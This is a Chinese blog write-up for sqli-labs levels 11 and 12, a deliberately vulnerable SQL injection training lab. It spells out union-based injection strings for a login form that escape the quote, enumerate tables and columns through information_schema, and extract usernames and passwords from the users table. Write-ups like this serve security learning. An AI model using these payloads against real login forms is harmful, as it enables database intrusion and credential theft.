sqli-labs注入漏洞解析--less-11/12

最新推荐文章于 2024-09-10 14:35:22 发布
最新推荐文章于 2024-09-10 14:35:22 发布
阅读量443 收藏 8
点赞数 8
文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duoba_an/article/details/140924641
版权

第十一关: 

这一关是一个表单提交,先浅试一下。

哈哈,提示登录失败啦,但是出现报错提示,说username这里输入报错了,或许这是一个突破点。

这不就出来了。占位符这里多做做就感觉出来了

这里单引号逃逸,注释掉后边的密码,简简单单查询出来,那就和之前的一样,简单粗暴上代码

aa' union  select 1,database()#

aa' union  select 1,group_concat(table_name)from information_schema.tables where table_schema='security'#

an' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'#

an' union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #

第十二关:

 浅试成功

这里和上一关的区别就是闭合方式的不一样,首先我们传入的uname使用双引号闭合,再传到username后使用)闭合,正常传值username=("aaa")这样子,逃逸:aa") union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #,执行后的语句:username=("an") union  select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #注释掉后边的语句,成功执行。

duoba_an
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
pandas读取xlsx文件使用sqlachemy写到数据库
最新发布
ithongchou的博客
09-10 359
如果你使用的是特定的数据库(如 SQLite、PostgreSQLMySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 356
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
被低估的SQL
weixin_61431494的博客
09-03 1548
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQL的高级查询练习知识点(day24)
新手小袁
09-05 1156
SQL的高级查询练习知识点,主要关于SQL的练习题,适用于新手练习,主要简述基础查询,条件查询等知识点
postgreSQL 除法运算返回0
日日留心的技术专栏
09-05 335
postgreSQL 进行除法运算,应该使用round+numeric 类型,否则当计算结果小于1 时返回0,大于1 时只返回整数部分.postgreSQL 除法运算返回0。
sql 中使用like%、函数导致索引失效的解决方案
weixin_58691039的博客
09-06 820
sql 中使用like%、函数导致索引失效的解决方案全文索引与虚拟列索引
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1308
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
mysql优化案例 纯demo案例 sql写法优化 不包含索引优化等
pingzhuyan的博客
09-10 440
sql优化案例: 测试草稿篇 感觉可以优化的记录 做过测试的会标记记录而已。
sql server 用户信息查询
woshilys的专栏
09-06 1024
【代码】sql server 用户信息查询。
SqlServer】SQL Server Management Studio (SSMS) 下载、安装、配置使用及卸载——保姆级教程
qq_42631788的博客
09-06 1095
通过以上教程,你可以完成 SQL Server Management Studio (SSMS) 的下载、安装、数据库连接及卸载操作。希望对你有所帮助,若有问题欢迎指正~😊。
12sql 中分组查询
m0_61265297的博客
09-06 396
5.查询各部门下,人数超过两人的岗位有哪些,显示部门编号、岗位名称。1.统计除10号部门的其他部门中,哪些部门的最高薪资达到三千。2.查询平均薪资超过1800的部门,显示部门编号及平均薪资。-- 2. 查找订单总金额超过 50.00 的客户。3.查询薪资合计超过5000的岗位及其平均薪资。COUNT(列名 | * |数字) --计数。4.查询部门人数超过4人的部门编号及薪资合计。MIN(列名) --求最小。MAX(列名) --求最大。sum(列名) --求和。AVG(列名) --
SQL的高级查询练习知识点中(day25)
新手小袁
09-06 899
SQL的高级查询练习知识点中,主要包含:重点掌握聚合函数的使用、重点掌握字段别名、重点掌握分组查询的语法、重点掌握having的使用方法、了解子查询的语法、重点掌握排序查询语法
“人大金仓”正式更名为“电科金仓”; TDSQL-C支持回收站/并行DDL等功能; BigQuery支持直接查询AlloyDB
云原生智能数据管理平台
09-06 779
TDSQL-C MySQL 版8.0内核(TXSQL)版本更新为3.1.15:新增回收站功能、新增并行 DDL 功能、支持全局索引功能、支持 Nonblocking DDL 功能、支持 BP 隔离功能、支持闪回查询功能、支持关联子查询结果缓存功能、支持 column 语法 ([39]):新增回收站功能、新增并行 DDL 功能、支持全局索引功能、支持 Nonblocking DDL 功能、支持 BP 隔离功能、支持闪回查询功能、支持关联子查询结果缓存功能、支持 column 语法 ([3])
SQL性能治理经验谈
Diligence is the mother of success.
09-04 1176
背景SQL数据类型数值这些类型包括严格数值数据类型(INTEGER、SMALLINT、DECIMAL 和 NUMERIC),以及近似数值数据类型(FLOAT、REAL 和 DOUBLE PRECISION)。类型大小范围(有符号)范围(无符号)用途TINYINT1 Bytes(-128,127)(0,255)小整数值SMALLINT2 Bytes(-32 768,32 767)(0,65 535)...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

duoba_an

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值